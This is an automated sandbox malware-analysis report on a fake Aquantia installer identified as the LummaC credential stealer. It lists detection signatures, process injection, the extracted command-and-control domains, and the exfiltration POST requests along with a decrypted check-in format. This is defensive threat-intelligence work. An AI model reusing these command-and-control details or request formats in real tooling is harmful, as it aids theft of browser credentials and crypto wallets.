Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aquantia_Installer.exe

Overview

General Information

Sample name:Aquantia_Installer.exe
Analysis ID:1561499
MD5:a19287453762b8bed2b6a7ce68c413ca
SHA1:3a2c2e5281803e16b7395aa02c2feede585acbf8
SHA256:9cae15eb24885aae94012eba1f8cdfb39a08615f876897d8d056771e368b8a96
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Aquantia_Installer.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\Aquantia_Installer.exe" MD5: A19287453762B8BED2B6A7CE68C413CA)
    • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 2380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["fumblingactor.cyou"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:21:56.676266+010020283713Unknown Traffic192.168.2.549704172.67.155.47443TCP
              2024-11-23T15:21:58.960386+010020283713Unknown Traffic192.168.2.549706172.67.155.47443TCP
              2024-11-23T15:22:01.305096+010020283713Unknown Traffic192.168.2.549708172.67.155.47443TCP
              2024-11-23T15:22:03.441953+010020283713Unknown Traffic192.168.2.549712172.67.155.47443TCP
              2024-11-23T15:22:05.594550+010020283713Unknown Traffic192.168.2.549714172.67.155.47443TCP
              2024-11-23T15:22:08.097558+010020283713Unknown Traffic192.168.2.549716172.67.155.47443TCP
              2024-11-23T15:22:10.655733+010020283713Unknown Traffic192.168.2.549717172.67.155.47443TCP
              2024-11-23T15:22:14.603009+010020283713Unknown Traffic192.168.2.549722172.67.155.47443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:21:57.563162+010020546531A Network Trojan was detected192.168.2.549704172.67.155.47443TCP
              2024-11-23T15:21:59.681780+010020546531A Network Trojan was detected192.168.2.549706172.67.155.47443TCP
              2024-11-23T15:22:15.336433+010020546531A Network Trojan was detected192.168.2.549722172.67.155.47443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:21:57.563162+010020498361A Network Trojan was detected192.168.2.549704172.67.155.47443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:21:59.681780+010020498121A Network Trojan was detected192.168.2.549706172.67.155.47443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:22:08.867406+010020480941Malware Command and Control Activity Detected192.168.2.549716172.67.155.47443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0.2.Aquantia_Installer.exe.6cf20000.4.unpackMalware Configuration Extractor: LummaC {"C2 url": ["fumblingactor.cyou"]}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
              Source: Aquantia_Installer.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: fumblingactor.cyou
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpString decryptor: Workgroup: -
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6AA63 CryptUnprotectData,3_2_02F6AA63
              Source: Aquantia_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49722 version: TLS 1.2
              Source: Aquantia_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mscorlib.pdb ty source: Aquantia_Installer.exe, 00000000.00000002.2351578827.000000000181B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\Aquantia_Installer.PDB source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER1023.tmp.dmp.6.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdbo source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb6 source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER1023.tmp.dmp.6.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbD`aq source: WER1023.tmp.dmp.6.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1023.tmp.dmp.6.dr
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF32983 FindFirstFileExW,0_2_6CF32983
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_01040F20
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 1CE638E1h0_2_01040F20
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h0_2_01039BA0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx]0_2_010201C0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 484CE391h0_2_010417D0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h0_2_0102B1E0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then mov edx, eax0_2_010391E0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_01041420
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_01009840
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]0_2_010284B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h3_2_02F6AA63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+34FC8218h]3_2_02F6AA63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02F6B3E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_02F913A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax3_2_02F89160
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_02F7DEC9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_02F90EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 1CE638E1h3_2_02F90EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_02F7B2F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 09785458h3_2_02F692DF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_02F85A40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 4F699CD4h3_2_02F91A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, word ptr [eax]3_2_02F91A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], al3_2_02F7DA13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ebx3_2_02F8FA17
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx3_2_02F5D3E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7D5D6260h3_2_02F69390
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h3_2_02F89B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_02F8E8C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]3_2_02F6D891
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_02F7A880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 933FB3DAh3_2_02F6A043
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_02F69848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 09785458h3_2_02F6983E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-46B27791h]3_2_02F7C9C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_02F549BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [esi], cx3_2_02F739A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02F739A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h3_2_02F7B160
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx]3_2_02F70140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, word ptr [edi+eax*4]3_2_02F57920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [ebp+eax*4+00h]3_2_02F57920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [ebp+ecx-6319B7C0h]3_2_02F76E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_02F797F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]3_2_02F8CFCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], bl3_2_02F597C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_02F527B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_02F8F7B4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+54D5508Fh]3_2_02F5E7A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 484CE391h3_2_02F91750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_02F73740
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], B03B7AC0h3_2_02F69710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi3_2_02F77C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]3_2_02F78430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-2BC2CEC9h]3_2_02F77C20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-2Bh]3_2_02F8F400
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edx+eax+02h]3_2_02F89DD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h3_2_02F69D72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h3_2_02F69D72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]3_2_02F72510

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.155.47:443
              Source: Malware configuration extractorURLs: fumblingactor.cyou
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.155.47:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.155.47:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=54TU150KE0PVRYIQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E5O0FK1MFJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XEPT2EPSN48ZUU9RJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4YLONCHJDYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XGTBCI5SBOJ8NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589595Host: frogs-severz.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: frogs-severz.sbs
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: fumblingactor.cyou
              Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
